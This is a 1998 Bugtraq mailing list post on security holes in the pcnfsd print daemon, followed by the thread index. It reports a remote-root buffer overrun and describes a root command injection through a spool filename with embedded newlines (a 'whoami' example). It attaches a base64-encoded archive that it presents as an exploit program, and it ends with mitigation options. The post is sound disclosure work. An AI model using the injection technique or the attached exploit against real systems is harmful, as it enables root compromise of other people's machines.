Bugtraq mailing list archives
pcnfsd ...
From: duncan () mygale org (ga)
Date: Tue, 13 Oct 1998 23:42:22 +0100
This is a multi-part message in MIME format. --------------70A2691163F0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit ((pcnfsd=="Phf Chronicle Needs Fresh Scandal Desperatly") ? TRUE:TRUE) After the two advisories released by rep-sec and rhino9 about pcnfsd, I decided to check if all the described holes were really present in my Slackware 3.1 distrib (I used the compiled rpc.pcnfsd code shipped with Slackware 3.5). By now, I suppose that everybody who was concerned by this security problem removed the pcnfs daemon on their system (or at least, run a patched version). You will find with this email an attached program that tries to exploit these security holes. This will help you to know if you are vulnerable or not (and to understand the weaknesses of the pcnfs daemon). Also, I found a buffer overrun in the pcnfs daemon (Slackware) that could lead to a remote root compromise. I didn't check all the code but I suppose that there may be other exploitable buffer overflows.. I didn't succeed to use the ps630() hole explained in rep sec advisory (same as pr_cancel() phf-like bug). It's because pcnfsd_print.c checks if the file really exists (and then tries to rename it with the .spl extension). Therefore, if the file doesn't exist then an error is returned. However, if a local user creates a filename in the /var/spool/pcnfs directory which is in fact the command to execute (ex : /var/spool/pcnfs/FILENAME\nwhoami\nBLAH) then ps630() will work indeed, executing the command as root). I didn't tried it though. By the way, I only have a linux box (not even connected to a network) so I only wrote and tested this program on my computer. Therefore, please, don't blame me if you can't compile it or if it doesn't work over inet (no udp checksum code implemented). If you have errors with the program then just hack it up if you really want to have it running. Now, if you don't know what to do with your rpc.pcnfsd then it's up to you to choose between these solutions : 1) still use unpatched pcnfs that will lead to a root compromise if an evil person wants to annoy you. or 2) use patched pcnfs but a remote user can still try to brute force an account (because he may retrieve all the logins and check for valid login/passwd without being logged). or 3) use patched pcnfs with the secure rpc lib that uses a control access list (like tcp wrapper) for ALL the rpc programs (not only portmapper) so that only allowed hosts are able to connect to pcnfs daemon. or 4) remove pcnfs on your server and consequently disallow remote printing access for your users (is it that bad ?...). ga --------------70A2691163F0 Content-Type: application/octet-stream; name="PROUT.TGZ" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="PROUT.TGZ" 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 qU1talOb2tSmv1T6L2qP9hAAyAAA --------------70A2691163F0--
Current thread:
- Referer (was Patches for wwwboard.pl), (continued)
- Referer (was Patches for wwwboard.pl) Michael Blythe (Oct 09)
- MacAttack Spikeman (Oct 08)
- Referer (was Patches for wwwboard.pl) Lincoln Stein (Oct 09)
- Re: Referer (was Patches for wwwboard.pl) David Schwartz (Oct 12)
- Re: Referer (was Patches for wwwboard.pl) Lincoln Stein (Oct 13)
- Re: Referer (was Patches for wwwboard.pl) Kevin Littlejohn (Oct 13)
- Referer (was Patches for wwwboard.pl) Michael Blythe (Oct 09)
- CERT Vendor-Initiated Bulletin VB-98.10 - sco.mscreen Aleph One (Oct 13)
- FreeBSD Security Advisory: FreeBSD-SA-98:07.rst Aleph One (Oct 13)
- Re: Referer (was Patches for wwwboard.pl) Adam Shostack (Oct 10)
- Followup to FP98 and other Frontpage bugs pedward () WEBCOM COM (Oct 12)
- pcnfsd ... ga (Oct 13)
- Re: pcnfsd ... Mark Zielinski (Oct 14)
- Re: Followup to FP98 and other Frontpage bugs Markus Stumpf (Oct 13)
- The poisoned NUL byte Olaf Kirch (Oct 14)
- Security Bulletins Digest (fwd) Piotr Strzy¿ewski (Oct 12)